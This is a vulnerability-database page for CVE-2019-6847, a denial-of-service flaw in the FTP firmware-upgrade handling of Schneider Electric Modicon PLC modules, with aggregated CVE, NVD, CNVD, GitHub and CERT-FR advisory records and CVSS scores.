Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2019-6847 (GCVE-0-2019-6847)
Vulnerability from cvelistv5
- CWE-755 - Improper Handling of Exceptional Conditions
URL | Tags | ||
---|---|---|---|
Vendor | Product | Version | ||
---|---|---|---|---|
n/a | Modicon M580, Modicon M340, and Modicon BMxCRA / 140CRA modules (see notification for version info) |
Version: Modicon M580, Modicon M340, and Modicon BMxCRA / 140CRA modules (see notification for version info) |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T20:31:04.413Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Modicon M580, Modicon M340, and Modicon BMxCRA / 140CRA modules (see notification for version info)", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Modicon M580, Modicon M340, and Modicon BMxCRA / 140CRA modules (see notification for version info)" } ] } ], "descriptions": [ { "lang": "en", "value": "A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-755", "description": "CWE-755: Improper Handling of Exceptional Conditions", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2021-04-19T12:18:02", "orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb", "shortName": "schneider" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cybersecurity@schneider-electric.com", "ID": "CVE-2019-6847", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Modicon M580, Modicon M340, and Modicon BMxCRA / 140CRA modules (see notification for version info)", "version": { "version_data": [ { "version_value": "Modicon M580, Modicon M340, and Modicon BMxCRA / 140CRA modules (see notification for version info)" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-755: Improper Handling of Exceptional Conditions" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/", "refsource": "MISC", "url": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/" } ] } } } }, "cveMetadata": { "assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb", "assignerShortName": "schneider", "cveId": "CVE-2019-6847", "datePublished": "2019-10-29T14:52:24", "dateReserved": "2019-01-25T00:00:00", "dateUpdated": "2024-08-04T20:31:04.413Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1", "vulnerability-lookup:meta": { "nvd": "{\"cve\":{\"id\":\"CVE-2019-6847\",\"sourceIdentifier\":\"cybersecurity@se.com\",\"published\":\"2019-10-29T19:15:22.267\",\"lastModified\":\"2024-11-21T04:47:16.320\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol.\"},{\"lang\":\"es\",\"value\":\"Existe una vulnerabilidad CWE-755: Manejo inadecuado de condiciones excepcionales en los m\u00f3dulos Modicon M580, Modicon M340, Modicon BMxCRA y 140CRA (todas las versiones de firmware), que podr\u00eda causar un ataque de denegaci\u00f3n de servicio en el servicio FTP al actualizar el firmware con una versi\u00f3n incompatible con la aplicaci\u00f3n en el controlador utilizando el protocolo FTP\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":4.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":3.6}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:S/C:N/I:N/A:P\",\"baseScore\":4.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.0,\"impactScore\":2.9,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"cybersecurity@se.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-755\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-755\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:schneider-electric:modicon_m580_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D52D735D-8AB5-40FE-A83F-266977601571\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:schneider-electric:modicon_m580:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E876C738-ABF6-4864-98A6-1E06E96A0DF4\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:schneider-electric:modicon_m340_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"05CBA9AD-ECB7-453F-8551-DD176FDE8043\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:schneider-electric:modicon_m340:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"138681A2-0146-492B-8E10-06849FC27C6E\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:schneider-electric:modicon_bmxcra_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"E4E41AAB-05A3-43A4-B97A-34F265E25F40\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:schneider-electric:modicon_bmxcra:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F80F2F1C-F681-4498-942E-31EDA9CF79F8\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:schneider-electric:modicon_140cra_firmware:*:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"76F5D4B2-1C0A-45E8-993C-DBBA4F745345\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:schneider-electric:modicon_140cra:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"94575CFC-1395-4BB4-8D4F-AA41F7068A26\"}]}]}],\"references\":[{\"url\":\"https://www.se.com/ww/en/download/document/SEVD-2019-281-02/\",\"source\":\"cybersecurity@se.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"https://www.se.com/ww/en/download/document/SEVD-2019-281-02/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]}]}}" } }
cnvd-2019-41494
Vulnerability from cnvd
厂商已发布了漏洞修复程序,请及时关注更新: https://download.schneider-electric.com/files?p_enDocType=Technical+leaflet&p_File_Name=SEVD-2019-281-02_Modicon_Controllers.pdf&p_Doc_Ref=SEVD-2019-281-02
Name | ['Schneider Electric Modicon M340', 'Schneider Electric Modicon M580', 'Schneider Electric Modicon BMxCRA', 'Schneider Electric Modicon 140CRA'] |
---|
{ "cves": { "cve": { "cveNumber": "CVE-2019-6847", "cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2019-6847" } }, "description": "Modicon M580/M340/BMxCRA/140CRA\u5747\u662fSchneider Electric\uff08\u65bd\u8010\u5fb7\u7535\u6c14\uff09\u63a8\u51fa\u7684\u53ef\u7f16\u7a0b\u903b\u8f91\u63a7\u5236\u5668\u3002\n\nSchneider Electric Modicon M580/M340/BMxCRA/140CRA\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u901a\u8fc7FTP\u534f\u8bae\u4f7f\u7528\u4e0e\u63a7\u5236\u5668\u4e2d\u7684\u5e94\u7528\u7a0b\u5e8f\u4e0d\u517c\u5bb9\u7684\u7248\u672c\u5347\u7ea7\u56fa\u4ef6\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002", "formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttps://download.schneider-electric.com/files?p_enDocType=Technical+leaflet\u0026p_File_Name=SEVD-2019-281-02_Modicon_Controllers.pdf\u0026p_Doc_Ref=SEVD-2019-281-02", "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e", "number": "CNVD-2019-41494", "openTime": "2019-11-19", "patchDescription": "Modicon M580/M340/BMxCRA/140CRA\u5747\u662fSchneider Electric\uff08\u65bd\u8010\u5fb7\u7535\u6c14\uff09\u63a8\u51fa\u7684\u53ef\u7f16\u7a0b\u903b\u8f91\u63a7\u5236\u5668\u3002\r\n\r\nSchneider Electric Modicon M580/M340/BMxCRA/140CRA\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u901a\u8fc7FTP\u534f\u8bae\u4f7f\u7528\u4e0e\u63a7\u5236\u5668\u4e2d\u7684\u5e94\u7528\u7a0b\u5e8f\u4e0d\u517c\u5bb9\u7684\u7248\u672c\u5347\u7ea7\u56fa\u4ef6\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002", "patchName": "Schneider Electric Modicon M580/M340/BMxCRA/140CRA\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\u7684\u8865\u4e01", "products": { "product": [ "Schneider Electric Modicon M340", "Schneider Electric Modicon M580", "Schneider Electric Modicon BMxCRA", "Schneider Electric Modicon 140CRA" ] }, "referenceLink": "https://nvd.nist.gov/vuln/detail/CVE-2019-6847", "serverity": "\u4e2d", "submitTime": "2019-10-30", "title": "Schneider Electric Modicon M580/M340/BMxCRA/140CRA\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e" }
gsd-2019-6847
Vulnerability from gsd
{ "GSD": { "alias": "CVE-2019-6847", "description": "A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol.", "id": "GSD-2019-6847" }, "gsd": { "metadata": { "exploitCode": "unknown", "remediation": "unknown", "reportConfidence": "confirmed", "type": "vulnerability" }, "osvSchema": { "aliases": [ "CVE-2019-6847" ], "details": "A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol.", "id": "GSD-2019-6847", "modified": "2023-12-13T01:23:49.444609Z", "schema_version": "1.4.0" } }, "namespaces": { "cve.org": { "CVE_data_meta": { "ASSIGNER": "cybersecurity@schneider-electric.com", "ID": "CVE-2019-6847", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Modicon M580, Modicon M340, and Modicon BMxCRA / 140CRA modules (see notification for version info)", "version": { "version_data": [ { "version_value": "Modicon M580, Modicon M340, and Modicon BMxCRA / 140CRA modules (see notification for version info)" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-755: Improper Handling of Exceptional Conditions" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/", "refsource": "MISC", "url": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/" } ] } }, "nvd.nist.gov": { "configurations": { "CVE_data_version": "4.0", "nodes": [ { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:schneider-electric:modicon_m580_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:schneider-electric:modicon_m580:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:schneider-electric:modicon_m340_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:schneider-electric:modicon_m340:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:schneider-electric:modicon_bmxcra_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:schneider-electric:modicon_bmxcra:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:schneider-electric:modicon_140cra_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:schneider-electric:modicon_140cra:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" } ] }, "cve": { "CVE_data_meta": { "ASSIGNER": "cybersecurity@schneider-electric.com", "ID": "CVE-2019-6847" }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "en", "value": "A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "en", "value": "CWE-755" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/", "refsource": "MISC", "tags": [ "Vendor Advisory" ], "url": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/" } ] } }, "impact": { "baseMetricV2": { "acInsufInfo": false, "cvssV2": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false }, "baseMetricV3": { "cvssV3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6 } }, "lastModifiedDate": "2022-02-03T16:09Z", "publishedDate": "2019-10-29T19:15Z" } } }
ghsa-q2g9-886v-2wv3
Vulnerability from github
A CWE-248: Uncaught Exception vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol.
{ "affected": [], "aliases": [ "CVE-2019-6847" ], "database_specific": { "cwe_ids": [ "CWE-755" ], "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2019-10-29T19:15:00Z", "severity": "MODERATE" }, "details": "A CWE-248: Uncaught Exception vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol.", "id": "GHSA-q2g9-886v-2wv3", "modified": "2022-05-24T17:00:05Z", "published": "2022-05-24T17:00:05Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6847" }, { "type": "WEB", "url": "https://www.schneider-electric.com/ww/en/download/document/SEVD-2019-281-02" }, { "type": "WEB", "url": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02" } ], "schema_version": "1.4.0", "severity": [] }
fkie_cve-2019-6847
Vulnerability from fkie_nvd
{ "configurations": [ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:schneider-electric:modicon_m580_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "D52D735D-8AB5-40FE-A83F-266977601571", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:schneider-electric:modicon_m580:-:*:*:*:*:*:*:*", "matchCriteriaId": "E876C738-ABF6-4864-98A6-1E06E96A0DF4", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:schneider-electric:modicon_m340_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "05CBA9AD-ECB7-453F-8551-DD176FDE8043", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:schneider-electric:modicon_m340:-:*:*:*:*:*:*:*", "matchCriteriaId": "138681A2-0146-492B-8E10-06849FC27C6E", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:schneider-electric:modicon_bmxcra_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "E4E41AAB-05A3-43A4-B97A-34F265E25F40", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:schneider-electric:modicon_bmxcra:-:*:*:*:*:*:*:*", "matchCriteriaId": "F80F2F1C-F681-4498-942E-31EDA9CF79F8", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:schneider-electric:modicon_140cra_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "76F5D4B2-1C0A-45E8-993C-DBBA4F745345", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:schneider-electric:modicon_140cra:-:*:*:*:*:*:*:*", "matchCriteriaId": "94575CFC-1395-4BB4-8D4F-AA41F7068A26", "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ], "cveTags": [], "descriptions": [ { "lang": "en", "value": "A CWE-755: Improper Handling of Exceptional Conditions vulnerability exists in Modicon M580, Modicon M340, Modicon BMxCRA and 140CRA modules (all firmware versions), which could cause a Denial of Service attack on the FTP service when upgrading the firmware with a version incompatible with the application in the controller using FTP protocol." }, { "lang": "es", "value": "Existe una vulnerabilidad CWE-755: Manejo inadecuado de condiciones excepcionales en los m\u00f3dulos Modicon M580, Modicon M340, Modicon BMxCRA y 140CRA (todas las versiones de firmware), que podr\u00eda causar un ataque de denegaci\u00f3n de servicio en el servicio FTP al actualizar el firmware con una versi\u00f3n incompatible con la aplicaci\u00f3n en el controlador utilizando el protocolo FTP" } ], "id": "CVE-2019-6847", "lastModified": "2024-11-21T04:47:16.320", "metrics": { "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }, "published": "2019-10-29T19:15:22.267", "references": [ { "source": "cybersecurity@se.com", "tags": [ "Vendor Advisory" ], "url": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.se.com/ww/en/download/document/SEVD-2019-281-02/" } ], "sourceIdentifier": "cybersecurity@se.com", "vulnStatus": "Modified", "weaknesses": [ { "description": [ { "lang": "en", "value": "CWE-755" } ], "source": "cybersecurity@se.com", "type": "Secondary" }, { "description": [ { "lang": "en", "value": "CWE-755" } ], "source": "nvd@nist.gov", "type": "Primary" } ] }
CERTFR-2019-AVI-488
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits Schneider Electric. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneVendor | Product | Description | ||
---|---|---|---|---|
Schneider Electric | N/A | Modicon Premium | ||
Schneider Electric | Modicon M340 | Modicon M340 | ||
Schneider Electric | N/A | EcoStruxure Power Monitoring Expert versions antérieures à PME 9.0 CU2 | ||
Schneider Electric | N/A | Modicon BMxCRA et les modules 140CRA | ||
Schneider Electric | N/A | Modicon BMENOC 0321 | ||
Schneider Electric | N/A | Modicon BMENOC 0311 | ||
Schneider Electric | N/A | Modicon M580 | ||
Schneider Electric | N/A | SoMove FDT versions v2.7.5 et antérieures | ||
Schneider Electric | N/A | EcoStruxure Power Monitoring Expert version 8.2 sans le dernier correctif de sécurité | ||
Schneider Electric | N/A | Modicon Quantum |
Title | Publication Time | Tags | |||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
{ "$ref": "https://www.cert.ssi.gouv.fr/openapi.json", "affected_systems": [ { "description": "Modicon Premium", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "Modicon M340", "product": { "name": "Modicon M340", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "EcoStruxure Power Monitoring Expert versions ant\u00e9rieures \u00e0 PME 9.0 CU2", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "Modicon BMxCRA et les modules 140CRA", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "Modicon BMENOC 0321", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "Modicon BMENOC 0311", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "Modicon M580", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "SoMove FDT versions v2.7.5 et ant\u00e9rieures", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "EcoStruxure Power Monitoring Expert version 8.2 sans le dernier correctif de s\u00e9curit\u00e9", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } }, { "description": "Modicon Quantum", "product": { "name": "N/A", "vendor": { "name": "Schneider Electric", "scada": true } } } ], "affected_systems_content": null, "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n", "cves": [ { "name": "CVE-2018-7833", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7833" }, { "name": "CVE-2019-6846", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6846" }, { "name": "CVE-2018-7830", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7830" }, { "name": "CVE-2018-7809", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7809" }, { "name": "CVE-2019-6841", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6841" }, { "name": "CVE-2019-6848", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6848" }, { "name": "CVE-2018-7810", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7810" }, { "name": "CVE-2018-7831", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7831" }, { "name": "CVE-2018-20031", "url": "https://www.cve.org/CVERecord?id=CVE-2018-20031" }, { "name": "CVE-2019-6845", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6845" }, { "name": "CVE-2018-20032", "url": "https://www.cve.org/CVERecord?id=CVE-2018-20032" }, { "name": "CVE-2019-6844", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6844" }, { "name": "CVE-2019-6842", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6842" }, { "name": "CVE-2018-20034", "url": "https://www.cve.org/CVERecord?id=CVE-2018-20034" }, { "name": "CVE-2019-6851", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6851" }, { "name": "CVE-2018-20033", "url": "https://www.cve.org/CVERecord?id=CVE-2018-20033" }, { "name": "CVE-2019-6826", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6826" }, { "name": "CVE-2018-7811", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7811" }, { "name": "CVE-2019-6849", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6849" }, { "name": "CVE-2019-6847", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6847" }, { "name": "CVE-2018-7804", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7804" }, { "name": "CVE-2019-6843", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6843" }, { "name": "CVE-2019-6850", "url": "https://www.cve.org/CVERecord?id=CVE-2019-6850" }, { "name": "CVE-2018-7812", "url": "https://www.cve.org/CVERecord?id=CVE-2018-7812" } ], "initial_release_date": "2019-10-08T00:00:00", "last_revision_date": "2019-10-08T00:00:00", "links": [], "reference": "CERTFR-2019-AVI-488", "revisions": [ { "description": "Version initiale", "revision_date": "2019-10-08T00:00:00.000000" } ], "risks": [ { "description": "D\u00e9ni de service \u00e0 distance" }, { "description": "Injection de code indirecte \u00e0 distance (XSS)" }, { "description": "Ex\u00e9cution de code arbitraire \u00e0 distance" }, { "description": "Contournement de la politique de s\u00e9curit\u00e9" }, { "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es" } ], "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nSchneider Electric. Certaines d\u0027entre elles permettent \u00e0 un attaquant de\nprovoquer une 